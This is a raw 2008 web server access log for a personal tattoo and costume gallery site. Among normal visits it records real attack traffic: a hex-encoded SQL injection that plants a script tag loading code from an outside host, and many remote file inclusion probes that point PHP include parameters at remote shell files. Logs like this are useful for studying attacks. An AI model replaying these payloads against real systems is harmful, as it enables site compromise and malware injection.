203.160.122.193 - - [16/Aug/2008:19:45:06 -0500] "GET /tattoo/tatd9.JPG HTTP/1.1" 200 17368 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
203.160.122.193 - - [16/Aug/2008:19:45:06 -0500] "GET /tattoo/tatd8.JPG HTTP/1.1" 200 13038 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
206.123.2.113 - - [16/Aug/2008:19:45:21 -0500] "GET /costume/ HTTP/1.1" 200 640 "http://en.wikipedia.org/wiki/Costume""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)"
206.123.2.113 - - [16/Aug/2008:19:45:25 -0500] "GET /costume/costume1.htm HTTP/1.1" 200 4913 "http://tomdolan.pconline.com/costume/""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)"
206.123.2.113 - - [16/Aug/2008:19:45:25 -0500] "GET /costume/enter1.gif HTTP/1.1" 200 22826 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)"
206.123.2.113 - - [16/Aug/2008:19:45:25 -0500] "GET /costume/history5.gif HTTP/1.1" 200 4380 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)"
206.123.2.113 - - [16/Aug/2008:19:45:26 -0500] "GET /costume/costm_a.JPG HTTP/1.1" 200 61141 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)"
58.210.80.217 - - [16/Aug/2008:19:45:31 -0500] "GET /logs/access_log.1203379200?';DeCLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E3830306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272720776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E3830306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));ExEC(@S); HTTP/1.1" 200 355700 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
206.123.2.113 - - [16/Aug/2008:19:45:39 -0500] "GET /costume/costume2.htm HTTP/1.1" 200 1810 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)"
89.208.43.121 - - [16/Aug/2008:19:45:40 -0500] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.citoyennete-active.org/mambots/content/test.txt??? HTTP/1.1" 404 308 "-""MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;"
89.208.43.121 - - [16/Aug/2008:19:45:40 -0500] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.citoyennete-active.org/mambots/content/test.txt??? HTTP/1.1" 404 313 "-""MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;"
206.123.2.113 - - [16/Aug/2008:19:45:44 -0500] "GET /costume/index1.htm HTTP/1.1" 200 21563 "http://tomdolan.pconline.com/costume/costume2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)"
206.123.2.113 - - [16/Aug/2008:19:46:00 -0500] "GET /costume/thmb2.htm HTTP/1.1" 200 3346 "http://tomdolan.pconline.com/costume/index1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)"
206.123.2.113 - - [16/Aug/2008:19:46:00 -0500] "GET /costume/costm13.jpg HTTP/1.1" 200 10011 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)"
206.123.2.113 - - [16/Aug/2008:19:46:00 -0500] "GET /costume/costm14.jpg HTTP/1.1" 200 10586 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)"
206.123.2.113 - - [16/Aug/2008:19:46:00 -0500] "GET /costume/costm15.jpg HTTP/1.1" 200 9724 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)"
206.123.2.113 - - [16/Aug/2008:19:46:00 -0500] "GET /costume/costm18.jpg HTTP/1.1" 200 9364 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)"
206.123.2.113 - - [16/Aug/2008:19:46:01 -0500] "GET /costume/costm17.jpg HTTP/1.1" 200 9825 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)"
206.123.2.113 - - [16/Aug/2008:19:46:01 -0500] "GET /costume/costm16.jpg HTTP/1.1" 200 9075 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)"
206.123.2.113 - - [16/Aug/2008:19:46:01 -0500] "GET /costume/costm19.jpg HTTP/1.1" 200 10555 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)"
206.123.2.113 - - [16/Aug/2008:19:46:01 -0500] "GET /costume/costm21.jpg HTTP/1.1" 200 9439 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)"
206.123.2.113 - - [16/Aug/2008:19:46:01 -0500] "GET /costume/costm20.jpg HTTP/1.1" 200 57110 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)"
206.123.2.113 - - [16/Aug/2008:19:46:01 -0500] "GET /costume/costm22.jpg HTTP/1.1" 200 9434 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)"
206.123.2.113 - - [16/Aug/2008:19:46:01 -0500] "GET /costume/costm23.jpg HTTP/1.1" 200 9858 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)"
206.123.2.113 - - [16/Aug/2008:19:46:01 -0500] "GET /costume/costm24.jpg HTTP/1.1" 200 9990 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)"
72.52.212.40 - - [16/Aug/2008:19:46:13 -0500] "GET /logs/access_log.1214524800/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://209.85.60.69/~forohipn/otro/clientscript/vbulletin_css/fonts.txt? HTTP/1.1" 404 372 "-""libwww-perl/5.811"
72.52.212.40 - - [16/Aug/2008:19:46:13 -0500] "GET /components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://209.85.60.69/~forohipn/otro/clientscript/vbulletin_css/fonts.txt? HTTP/1.1" 404 345 "-""libwww-perl/5.811"
72.52.212.40 - - [16/Aug/2008:19:46:13 -0500] "GET /logs/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://209.85.60.69/~forohipn/otro/clientscript/vbulletin_css/fonts.txt? HTTP/1.1" 404 350 "-""libwww-perl/5.811"
89.208.43.121 - - [16/Aug/2008:19:46:19 -0500] "GET //PHP_CON/Exchange/include.php?webappcfg[APPPATH]=http://www.citoyennete-active.org/mambots/content/test.txt??? HTTP/1.1" 404 313 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
213.188.130.113 - - [16/Aug/2008:19:46:21 -0500] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
213.188.130.113 - - [16/Aug/2008:19:46:21 -0500] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
89.208.43.121 - - [16/Aug/2008:19:46:23 -0500] "GET /logs//PHP_CON/Exchange/include.php?webappcfg[APPPATH]=http://www.citoyennete-active.org/mambots/content/test.txt??? HTTP/1.1" 404 318 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
89.248.110.152 - - [16/Aug/2008:19:46:35 -0500] "GET /logs/access_log.1214438400/modules/agendax/addevent.inc.php?agendax_path=http://www.geocities.com/himar84/id.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
203.183.129.14 - - [16/Aug/2008:19:47:19 -0500] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
203.183.129.14 - - [16/Aug/2008:19:47:20 -0500] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
212.150.247.23 - - [16/Aug/2008:19:47:22 -0500] "GET /logs//admin/frontpage_right.php?loadadminpage=http://makemoneymania.info/.../rid??? HTTP/1.1" 404 315 "-""Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)"
212.150.247.23 - - [16/Aug/2008:19:47:22 -0500] "GET //admin/frontpage_right.php?loadadminpage=http://makemoneymania.info/.../rid??? HTTP/1.1" 404 310 "-""Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)"
217.23.156.220 - - [16/Aug/2008:19:47:44 -0500] "GET /logs/access_log.1208044800//errors.php?error=http://www.acoc.co.kr/acoc/board/include/idchitoz.txt?? HTTP/1.1" 404 322 "-""libwww-perl/5.805"
217.23.156.220 - - [16/Aug/2008:19:47:44 -0500] "GET //errors.php?error=http://www.acoc.co.kr/acoc/board/include/idchitoz.txt?? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
217.23.156.220 - - [16/Aug/2008:19:47:45 -0500] "GET /logs//errors.php?error=http://www.acoc.co.kr/acoc/board/include/idchitoz.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
195.13.58.250 - - [16/Aug/2008:19:48:34 -0500] "GET /logs/access_log.1209600000/administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.plovephotography.com/plg/phpSecurePages/v6id?? HTTP/1.1" 404 365 "-""libwww-perl/5.803"
217.23.156.220 - - [16/Aug/2008:19:48:48 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.acoc.co.kr/acoc/board/include/idchitoz.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
217.23.156.220 - - [16/Aug/2008:19:48:48 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.acoc.co.kr/acoc/board/include/idchitoz.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
193.201.218.158 - - [16/Aug/2008:19:48:58 -0500] "GET /logs/errors.php?error=http://www.reinaldo.kit.net/cmdtotal.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
193.201.218.158 - - [16/Aug/2008:19:49:00 -0500] "GET /errors.php?error=http://www.reinaldo.kit.net/cmdtotal.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
82.165.43.63 - - [16/Aug/2008:19:50:01 -0500] "GET /logs/access_log.1203379200/administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://502ndtactical.com/ultrastats/include/roid?? HTTP/1.1" 404 365 "-""libwww-perl/5.803"
89.208.43.121 - - [16/Aug/2008:19:50:11 -0500] "GET /logs/access_log.1206230400//newspublish/include.php?path%5Bdocroot%5D=http://www.newshop.ru/backup/safe1.txt??? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
89.208.43.121 - - [16/Aug/2008:19:50:11 -0500] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.newshop.ru/backup/safe1.txt??? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
89.208.43.121 - - [16/Aug/2008:19:50:12 -0500] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.newshop.ru/backup/safe1.txt??? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
212.150.247.23 - - [16/Aug/2008:19:50:32 -0500] "GET //admin/frontpage_right.php?loadadminpage=http://makemoneymania.info/.../rid??? HTTP/1.1" 404 310 "-""Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)"
212.150.247.23 - - [16/Aug/2008:19:50:32 -0500] "GET /logs//admin/frontpage_right.php?loadadminpage=http://makemoneymania.info/.../rid??? HTTP/1.1" 404 315 "-""Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)"
89.208.43.121 - - [16/Aug/2008:19:50:40 -0500] "GET /logs//ashnews.php?pathtoashnews=http://www.newshop.ru/backup/safe1.txt??? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
89.208.43.121 - - [16/Aug/2008:19:50:40 -0500] "GET //ashnews.php?pathtoashnews=http://www.newshop.ru/backup/safe1.txt??? HTTP/1.1" 404 296 "-""libwww-perl/5.805"
206.123.2.113 - - [16/Aug/2008:19:50:42 -0500] "GET /costume/thmb1.htm HTTP/1.1" 200 3799 "http://tomdolan.pconline.com/costume/costume2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)"
206.123.2.113 - - [16/Aug/2008:19:50:42 -0500] "GET /costume/costm2.jpg HTTP/1.1" 200 36199 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)"
206.123.2.113 - - [16/Aug/2008:19:50:43 -0500] "GET /costume/costm1.jpg HTTP/1.1" 200 59753 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)"
206.123.2.113 - - [16/Aug/2008:19:50:43 -0500] "GET /costume/costm3.jpg HTTP/1.1" 200 39529 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)"
206.123.2.113 - - [16/Aug/2008:19:50:43 -0500] "GET /costume/costm4.jpg HTTP/1.1" 200 36814 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)"
206.123.2.113 - - [16/Aug/2008:19:50:43 -0500] "GET /costume/costm5.jpg HTTP/1.1" 200 36546 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)"
206.123.2.113 - - [16/Aug/2008:19:50:43 -0500] "GET /costume/costm6.jpg HTTP/1.1" 200 39194 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)"
206.123.2.113 - - [16/Aug/2008:19:50:43 -0500] "GET /costume/costm7.jpg HTTP/1.1" 200 35141 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)"
206.123.2.113 - - [16/Aug/2008:19:50:44 -0500] "GET /costume/costm8.jpg HTTP/1.1" 200 35448 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)"
206.123.2.113 - - [16/Aug/2008:19:50:44 -0500] "GET /costume/costm9.jpg HTTP/1.1" 200 38021 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)"
206.123.2.113 - - [16/Aug/2008:19:50:44 -0500] "GET /costume/costm11.jpg HTTP/1.1" 200 37363 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)"
206.123.2.113 - - [16/Aug/2008:19:50:44 -0500] "GET /costume/costm10.jpg HTTP/1.1" 200 60187 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)"
206.123.2.113 - - [16/Aug/2008:19:50:45 -0500] "GET /costume/costm12.jpg HTTP/1.1" 200 35291 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)"
82.165.43.63 - - [16/Aug/2008:19:50:57 -0500] "GET /logs/administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://502ndtactical.com/ultrastats/include/roid?? HTTP/1.1" 404 343 "-""libwww-perl/5.803"
82.165.43.63 - - [16/Aug/2008:19:50:58 -0500] "GET /administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://502ndtactical.com/ultrastats/include/roid?? HTTP/1.1" 404 338 "-""libwww-perl/5.803"
206.123.2.113 - - [16/Aug/2008:19:51:41 -0500] "GET /costume/thmb3.htm HTTP/1.1" 200 2922 "http://tomdolan.pconline.com/costume/costume2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)"
206.123.2.113 - - [16/Aug/2008:19:51:41 -0500] "GET /costume/costm26.jpg HTTP/1.1" 200 9402 "http://tomdolan.pconline.com/costume/thmb3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)"
206.123.2.113 - - [16/Aug/2008:19:51:41 -0500] "GET /costume/costm25.jpg HTTP/1.1" 200 9810 "http://tomdolan.pconline.com/costume/thmb3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)"
206.123.2.113 - - [16/Aug/2008:19:51:41 -0500] "GET /costume/costm27.jpg HTTP/1.1" 200 9516 "http://tomdolan.pconline.com/costume/thmb3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)"
206.123.2.113 - - [16/Aug/2008:19:51:41 -0500] "GET /costume/costm28.jpg HTTP/1.1" 200 10658 "http://tomdolan.pconline.com/costume/thmb3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)"
206.123.2.113 - - [16/Aug/2008:19:51:41 -0500] "GET /costume/costm29.jpg HTTP/1.1" 200 9835 "http://tomdolan.pconline.com/costume/thmb3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)"
206.123.2.113 - - [16/Aug/2008:19:51:41 -0500] "GET /costume/costm31.jpg HTTP/1.1" 200 9395 "http://tomdolan.pconline.com/costume/thmb3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)"
206.123.2.113 - - [16/Aug/2008:19:51:41 -0500] "GET /costume/costm32.jpg HTTP/1.1" 200 9839 "http://tomdolan.pconline.com/costume/thmb3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)"
206.123.2.113 - - [16/Aug/2008:19:51:41 -0500] "GET /costume/costm30.jpg HTTP/1.1" 200 59433 "http://tomdolan.pconline.com/costume/thmb3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)"
206.123.2.113 - - [16/Aug/2008:19:51:42 -0500] "GET /costume/costm33.jpg HTTP/1.1" 200 9703 "http://tomdolan.pconline.com/costume/thmb3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)"
206.123.2.113 - - [16/Aug/2008:19:51:42 -0500] "GET /costume/costm34.jpg HTTP/1.1" 200 9637 "http://tomdolan.pconline.com/costume/thmb3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)"
206.123.2.113 - - [16/Aug/2008:19:51:42 -0500] "GET /costume/costm35.jpg HTTP/1.1" 200 10912 "http://tomdolan.pconline.com/costume/thmb3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)"
206.123.2.113 - - [16/Aug/2008:19:51:42 -0500] "GET /costume/costm36.jpg HTTP/1.1" 200 9631 "http://tomdolan.pconline.com/costume/thmb3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)"
195.13.58.250 - - [16/Aug/2008:19:51:50 -0500] "GET /logs/administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.plovephotography.com/plg/phpSecurePages/v6id?? HTTP/1.1" 404 343 "-""libwww-perl/5.803"
195.13.58.250 - - [16/Aug/2008:19:51:50 -0500] "GET /administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.plovephotography.com/plg/phpSecurePages/v6id?? HTTP/1.1" 404 338 "-""libwww-perl/5.803"
195.13.58.250 - - [16/Aug/2008:19:51:54 -0500] "GET /logs/administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.plovephotography.com/plg/phpSecurePages/v6id?? HTTP/1.1" 404 343 "-""libwww-perl/5.803"
